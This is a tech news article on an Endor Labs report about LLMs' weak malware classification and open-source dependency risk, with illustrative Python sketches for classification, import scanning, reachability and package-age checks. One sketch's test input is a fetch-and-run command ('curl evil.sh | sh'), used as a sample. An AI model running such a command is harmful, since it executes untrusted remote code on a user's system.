UPDATED 06:00 EDT / JULY 19 2023


Endor Labs report warns AI and LLMs struggle to classify malware risk

A new report from dependency lifecycle management startup Endor Labs Inc. warns that artificial intelligence and large language models are unable to accurately classify malware risk in most cases.

The “State of Dependency Management 2023” report, compiled by Endor Labs’ Station 9 research team, explores emerging trends that software organizations need to consider as part of their security strategy, along with the risks of using existing open-source software in application development. The rise of services such as OpenAI LP’s ChatGPT application programming interface comes in for particular attention, as does the finding that almost half of all applications make no calls to security-sensitive APIs in their own code base.

Key findings in the report include that existing LLM technologies can’t yet be used to reliably assist in malware detection at scale. Instead, the researchers found that LLMs accurately classify malware risk in barely 5% of all cases.

While the report notes that AI and LLM models do have value in manual review workflows, it argues they will likely never be fully reliable in autonomous workflows because they can’t be trained to recognize novel attack approaches, such as those derived through LLM recommendations themselves.
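To make that workflow concrete, a minimal sketch of the kind of LLM-assisted classifier the researchers describe might look like the following. The prompt wording, the `gpt-3.5-turbo` model choice and the three risk labels are illustrative assumptions, not details taken from the report:

```python
# Hypothetical sketch: asking an LLM to rate the malware risk of a code
# snippet. Prompt, model and labels are illustrative assumptions; per the
# report, answers like these are accurate in only ~5% of cases, so the
# output should be treated as a hint for a human reviewer, not a verdict.
import openai  # pip install openai (0.27.x-era API, mid-2023)

RISK_LABELS = ("benign", "suspicious", "malicious")

def classify_snippet(snippet: str) -> str:
    response = openai.ChatCompletion.create(
        model="gpt-3.5-turbo",
        messages=[
            {"role": "system",
             "content": "You are a security reviewer. Answer with exactly "
                        "one word: benign, suspicious or malicious."},
            {"role": "user", "content": f"Classify this code:\n\n{snippet}"},
        ],
        temperature=0,  # keep the classification output as stable as possible
    )
    answer = response.choices[0].message.content.strip().lower()
    return answer if answer in RISK_LABELS else "unknown"

print(classify_snippet("import os; os.system('curl evil.sh | sh')"))
```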

The report found that 45% of applications have no calls to security-sensitive APIs in their own code base, but that number drops to 5% once dependencies are included. The results indicate that organizations routinely underestimate risk when they don’t analyze their use of such APIs through open-source dependencies.
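A toy scan shows why first-party-only analysis understates exposure: it never sees the same calls made inside third-party packages. The list of “security-sensitive” modules below is an illustrative assumption, not Endor Labs’ taxonomy:

```python
# Toy illustration of the blind spot: scanning only first-party source
# files for security-sensitive imports says nothing about identical calls
# made inside dependencies. The module list here is an assumption.
import ast
from pathlib import Path

SENSITIVE_MODULES = {"subprocess", "pickle", "socket", "ctypes"}

def sensitive_imports(root: Path) -> set[str]:
    found = set()
    for path in root.rglob("*.py"):
        tree = ast.parse(path.read_text(encoding="utf-8"), filename=str(path))
        for node in ast.walk(tree):
            if isinstance(node, ast.Import):
                found |= {a.name.split(".")[0] for a in node.names} & SENSITIVE_MODULES
            elif isinstance(node, ast.ImportFrom) and node.module:
                if node.module.split(".")[0] in SENSITIVE_MODULES:
                    found.add(node.module.split(".")[0])
    return found

# Scanning src/ alone may return an empty set even when a dependency in
# site-packages shells out via subprocess; the 45% -> 5% gap in the
# report comes from counting those transitive call sites too.
print(sensitive_imports(Path("src")))
```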

Java gets a look-in as well. The report finds that even though 71% of typical Java application code comes from open-source components, applications use only 12% of that imported code. Vulnerabilities in unused code are rarely exploitable, meaning organizations could eliminate or deprioritize up to 60% of remediation work with reliable insights into which code is reachable throughout an application.
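Reachability analysis of this kind boils down to a graph traversal from an application’s entry points. The sketch below is a generic illustration of the idea, not Endor Labs’ implementation; the call graph and function names are made up:

```python
# Generic sketch of reachability-based vulnerability triage: walk the
# call graph from the app's entry points and deprioritize findings in
# functions that are never reached. Graph and names are hypothetical.
from collections import deque

# caller -> set of callees (in practice produced by static analysis)
call_graph = {
    "main":               {"parse_config", "handle_request"},
    "handle_request":     {"render_template"},
    "parse_config":       set(),
    "render_template":    set(),
    "legacy_xml_load":    {"unsafe_deserialize"},  # imported, never called
    "unsafe_deserialize": set(),
}

def reachable(entry_points: set[str]) -> set[str]:
    seen, queue = set(entry_points), deque(entry_points)
    while queue:
        for callee in call_graph.get(queue.popleft(), ()):
            if callee not in seen:
                seen.add(callee)
                queue.append(callee)
    return seen

vulnerable = {"unsafe_deserialize", "render_template"}
live = reachable({"main"})
print("prioritize:",   vulnerable & live)   # {'render_template'}
print("deprioritize:", vulnerable - live)   # {'unsafe_deserialize'}
```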

ChatGPT’s API is already seeing use in 900 Node Package Manager and Python Package Index packages across various problem domains, and three-quarters of these were found to be completely new packages. The report noted that this pairing of rapid growth with a lack of historical data potentially opens the door to attacks.
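One practical way to act on that warning is to check how much release history a package actually has before depending on it. The sketch below uses PyPI’s public JSON API; the 90-day threshold is an arbitrary assumption for illustration:

```python
# Sketch: flag PyPI packages with little release history, the kind of
# signal the report suggests matters for brand-new AI-related packages.
# Uses PyPI's public JSON API; the 90-day cutoff is an assumption.
from datetime import datetime, timedelta, timezone
import requests

def first_release_age(package: str) -> timedelta:
    data = requests.get(f"https://pypi.org/pypi/{package}/json", timeout=10).json()
    uploads = [
        datetime.fromisoformat(f["upload_time_iso_8601"].replace("Z", "+00:00"))
        for files in data["releases"].values() for f in files
    ]
    return datetime.now(timezone.utc) - min(uploads)

def looks_too_new(package: str, min_age_days: int = 90) -> bool:
    # True when the package's first upload is younger than the cutoff
    return first_release_age(package) < timedelta(days=min_age_days)

print(looks_too_new("openai"))  # established package -> False
```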

“The fact that there’s been such a rapid expansion of new technologies related to artificial intelligence and that these capabilities are being integrated into so many other applications is truly remarkable — but it’s equally important to monitor the risks they bring with them,” Henrik Plate, lead security researcher at Endor Labs Station 9, said ahead of the report’s release. “These advances can cause considerable harm if the packages selected introduce malware and other risks to the software supply chain.”

